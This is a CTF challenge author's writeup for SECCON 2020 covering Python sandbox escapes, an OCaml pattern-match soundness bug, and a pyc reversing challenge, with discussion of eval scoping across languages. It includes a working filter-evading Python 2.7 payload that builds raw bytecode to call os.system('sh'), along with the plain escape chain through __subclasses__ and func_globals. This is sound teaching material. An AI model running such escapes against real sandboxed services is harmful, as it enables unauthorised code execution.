SECCON 2020 Online CTF Writeup: Yet/Yet^2 Another PySandbox, mlml, Fixer

SECCON writeup

I was the author of the four challenges: Yet Another PySanbdox, Yet2 Another PySandbox, mlml, Fixer. In this post, I will talk about the author's writeup and each challenge's background concept.

Yet Another PySandbox

You can create any function by bypassing the filter by writing function's bytecode directly. Though there are tons of ways to do it, I'll give you an example to do that as follows.

[setattr(f,'func_code',type(f.func_code)(0,0,2,67,'d\x06\x00j\x00\x00j\x01\x00d\x01\x00\x19j\x02\x00\x83\x00\x00d\x02\x00\x19j\x03\x00j\x04\x00d\x03\x00\x19j\x05\x00d\x04\x00\x19j\x06\x00j\x07\x00d\x05\x00\x83\x01\x00\x01d\x00\x00'+'s'.upper(),([].append(1),0,59,'sys','o'+'s.path','sh',()),('_'+'_cl'+'ass_'+'_','_'+'_bas'+'es_'+'_','_'+'_subcl'+'asses_'+'_','_'+'_init_'+'_','func_glob'+'als','mod'+'ules','o'+'s','sy'+'stem'),(),'','',0,''))+f()for    f   in[lambda   :1]]

The central idea of this is to modify func_code of the given function by using setattr. In Python 2.7, code class requires the following arguments:

code(argcount, nlocals, stacksize, flags, codestring, constants, names,
      varnames, filename, name, firstlineno, lnotab[, freevars[, cellvars]])

Create a code object.  Not for the faint of heart.

By giving these values, you can create any functions you can write. Since you can pass the required values like __class__ by specifying a string like '_' + '_cla' + 'ss_' + '_', you can bypass the filter.

Also we have to pass the body of function, codestring. The above bytecode is generated by the following function's bytecode:

def f():
    ().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals["sys"].modules["os.path"].os.system("sh")

This function is the typical way to access shell without using the global builtins.

Yet2 Another PySandbox

This challenge is related to "Yet" challenge, but the intended solution is entirely different.

The answer is straightforward. (lambda:sandboxed_eval)() will give you sandboxed_eval function for you, and since this function alone does not contain any filtering features, you can do eval freely. That is, you can do typical sandbox escaping like ().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals["sys"].modules["os.path"].os.system("sh") . Of course, you have to fix a little to bypass the filter before you get sandboxed_eval without check. However, it is easy since eval receives a string, and you can bypass the filter by a string like '_' + '_cla' + 'ss_' + '_'.

This specification is written in Execution model of Python's reference. We can find the following statement

The eval() and exec() functions do not have access to the full environment for resolving names. Names may be resolved in the local and global namespaces of the caller. Free variables are not resolved in the nearest enclosing namespace but in the global namespace. 1 The exec() and eval() functions have optional arguments to override the global and local namespace. If only one namespace is specified, it is used for both.

That is, if you nest scopes within eval, the scope will be global.

The interesting thing is that why this a little "strange" behavior happens? First, consider whether this is really a strange thing or not. Here is the result of the following three languages.

JavaScript

Welcome to Node.js v14.13.1.
Type ".help" for more information.
> const x = 1;
undefined
> function a() {
... const x = 2;
... return eval("(()=>x)()");
... }
undefined
> a()
2

(^_^)v

Ruby

irb(main):001:0> x = 1
=> 1
irb(main):002:0> def a()
irb(main):003:1>   x = 2
irb(main):004:1>   eval("lambda{||x}.call")
irb(main):005:1> end
=> :a
irb(main):006:0> a()
=> 2

(^_^)v

Perl

main::(-e:1):    0
  DB<1> my $x = 1;

  DB<2> sub a { my $x = 2; return eval("(sub {$x})->()"); }

  DB<3> print(a(), "\n");
2

(^_^)v

Python 2.7

Python 2.7.16 (default, Jun  5 2020, 22:59:21)
[GCC 4.2.1 Compatible Apple LLVM 11.0.3 (clang-1103.0.29.20) (-macos10.15-objc- on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> x = 1
>>> def a():
...   x = 2
...   return eval("(lambda:x)()")
...
>>> a()
1

🥺🥺🥺🥺 (Note that the same thing happens also in Python 3.9)

The natural thing for me is that the behavior of eval should be the same as the behavior without eval. That is, the semantics of eval("XXX") should be equivalent to that of XXX. So, for me, Python's behavior is bizarre.

Okay, I can accept that there is a "consistent policy" such as "eval's scope is always equal to the global." However, furthermore strangely, the followings seem to have different policies about free variables of eval.

>>> x = 1
>>> def a():
...   x = 2
...   return eval('x')
...
>>> a()
2

and

>>> x = 1
>>> def a():
...   x = 2
...   return eval("(lambda:x)()")
...
>>> a()
1

Why does this happen? Engdegård reported this curious behavior before. This argument was fine. First, as for the eval's scope, we can consider some consistent policies, as Engdegård stated.

A1. In an empty environment with no bindings at all, or just the language-defined standard bindings. A2. In the (or a) top-level environment; local, lexically bound variables where the eval() takes place are not visible to the argument expression. A3. In the same lexical environment as the eval() call itself.

But the actual policy of Python is

A4. A mixed hybrid environment of some kind: The identifiers representing variables that are to be evaluated immediately are looked up in the lexical environment of the eval expression; identifiers representing variables in delayed-evaluation positions use the global environment.

Actually, in that argument, there is no agreement of the conclusion of "why." However, I think Hylton's answer is a good suggestion. Python's interpreter has to determine whether each local variable should be stored in a cell or a local (closures can capture only cell variables, so if a variable is captured, then the interpreter will store it in a cell).

You can check this behavior as the following disassemblies:

>>> def f():
...     x = 2
...     return lambda: x
...
>>> dis.dis(f)
  2           0 LOAD_CONST               1 (2)
              3 STORE_DEREF              0 (x)       ### <- STORE x in a cell

  3           6 LOAD_CLOSURE             0 (x)
              9 BUILD_TUPLE              1
             12 LOAD_CONST               2 (<code object <lambda> at 0x106200230, file "<stdin>", line 3>)
             15 MAKE_CLOSURE             0
             18 RETURN_VALUE
>>>
>>>
>>> def f():
...     x = 2
...     return eval("lambda: x")
...
>>> dis.dis(f)
  2           0 LOAD_CONST               1 (2)
              3 STORE_FAST               0 (x)

  3           6 LOAD_GLOBAL              0 (eval)
              9 LOAD_CONST               2 ('lambda: x')
             12 CALL_FUNCTION            1
             15 RETURN_VALUE

I think it is not a good idea in terms of efficiency that the bytecode compiler has to put all the variables in the memory cell because of the existence of lambdas in eval. So, I can understand the current constraint of eval, though it is strange.

Of course, the semantics of the language should be separated from how it is implemented. However, maybe the initial design of the eval and lambda is not well-considered (that is why this inconsistency problem was not documented at first). I think we can consider some mitigations to make eval natural, but this issue does not affect almost all users (who cares lambdas in eval :P), so the problem may exist until now and in the future.

Unintended solution for Yet/Yet2 Another PySandbox

Actually, because of my thoughtless test play, the filter of Yet and Yet2 Another PySandbox was kinda weak, and I should have added frame as prohibited words. You may bypass that sandbox by using Python's generator for both of the challenges, in fact (since in Yet2, there are no builtins, it's complicated, but someone did).

mlml

First, I have to apologize to you since my filter to avoid unintended solution was too weak, and it led to the renewal of the challenge. I am really sorry about that.

After the renewal, there are three solvers: perfectblue, Ten*48 and PPP. Thank you for playing! Yet, still, the refined filter was too weak, and their solutions submitted to the server were not intended ones (They were using unsafe string manipulation functions).

The intended solution is to use OCaml's unsound issue to trigger memory corruption.

The following OCaml program will break out from the OCaml's safety (the following program was taken from the above issue):

type u = {a: bool; mutable b: int option}

let f x =
  match x with
    {a=false} -> 0
  | {b=None} -> 1
  | _ when (x.b <- None; false) -> 2
  | {a=true; b=Some y} -> y

let _ = f {a=true; b=Some 5}

Focus on the third match guard. This guard always evaluates to false, but there is a side effect that x.b will be assigned to None during the evaluation. Because of the lousy implementation of OCaml compiler, the last pattern will match to x, which leads to the dereference of None, and Segmentation Fault. By utilizing this fact preciously, we can get a shell. My PoC is a little long, so I put it on gist.

The background idea related to this challenge is that we can avoid this issue by using ownership system like the one Rust has since, within a pattern match "the pointer to be matched" should not be modified. Consider the following Rust program.

fn f(x: &mut (bool, Option<i32>)) -> i32 {
    match x {
        (false, _) => 0,
        (_, None) => 1,
        _ if ( {let z = &mut x.1; *z = None; false} ) => 2,
        (true, Some(y)) => *y,
    }
}

fn main() {
   let mut x = (true, Some(5));
   println!("{}", f(&mut x));
}

If you compile it, rustc will complain that within the match-guard, variable x should be immutable:

$ rustc prog.rs
error[E0510]: cannot mutably borrow `x.1` in match guard
 --> prog.rs:6:25
  |
3 |     match x {
  |           - value is immutable in match guard
...
6 |         _ if ( {let z = &mut x.1; *z = None; false} ) => 2,
  |                         ^^^^^^^^ cannot mutably borrow

error: aborting due to previous error

For more information about this error, try `rustc --explain E0510

`.

I think this is also an example of the collaboration of efficiency and safety thanks to Rust type system.

Fixer

Fixer is about pyc reversing (with Python3.9) and many fixpoints. If you find that there is a combinator of the following:

(lambda a: (lambda b: a(lambda c: b(b)(c)))(lambda b: a(lambda c: b(b)(c))))

you will be able to parse the whole structure of the bytecode.

This challenge was first created by me, but after that, @theoremoon, @ptr-yudai and @xrekkusu have investigated "how should be organized as a fun challenge" deeply. Thank you. Actually, though it was controversial to submit this chall as a reversing challenge, it would be grateful to me if you felt fun with this challenge.